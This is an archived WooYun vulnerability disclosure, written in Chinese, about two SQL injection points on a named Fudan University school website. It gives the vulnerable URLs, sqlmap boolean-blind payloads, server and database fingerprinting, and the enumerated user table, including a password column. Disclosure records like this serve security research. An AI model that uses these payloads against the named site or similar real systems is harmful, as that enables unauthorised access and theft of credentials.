乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-09: 细节已通知厂商并且等待厂商处理中 2015-11-22: 厂商已经主动忽略漏洞,细节向公众公开
复旦大学某学院存在SQL注入的漏洞
复旦大学社会发展与公共政策学院存在两个SQL注入点http://www.oldssdpp.fudan.edu.cn注入点:http://www.oldssdpp.fudan.edu.cn/news1.asp?id=1503http://www.oldssdpp.fudan.edu.cn/sabout.asp?lx=small&xclassid=1&id=11证明:
sqlmap identified the following injection point(s) with a total of 84 HTTP(s) requests:Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: lx=small&xclassid=1&id=11 AND 3692=3692---sqlmap identified the following injection point(s) with a total of 82 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1503 AND 8150=8150------web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft Access
表信息:
Database: Microsoft_Access_masterdb[4 tables]+--------+| user || books || config || links |+--------+sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1503 AND 8150=8150---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft AccessDatabase: Microsoft_Access_masterdbTable: user[4 columns]+--------------+-------------+| Column | Type |+--------------+-------------+| content | non-numeric || userid | numeric || username | numeric || userpassword | non-numeric |+--------------+-------------+
你们懂
危害等级:无影响厂商忽略
忽略时间:2015-11-22 06:40
漏洞Rank:2 (WooYun评价)
暂无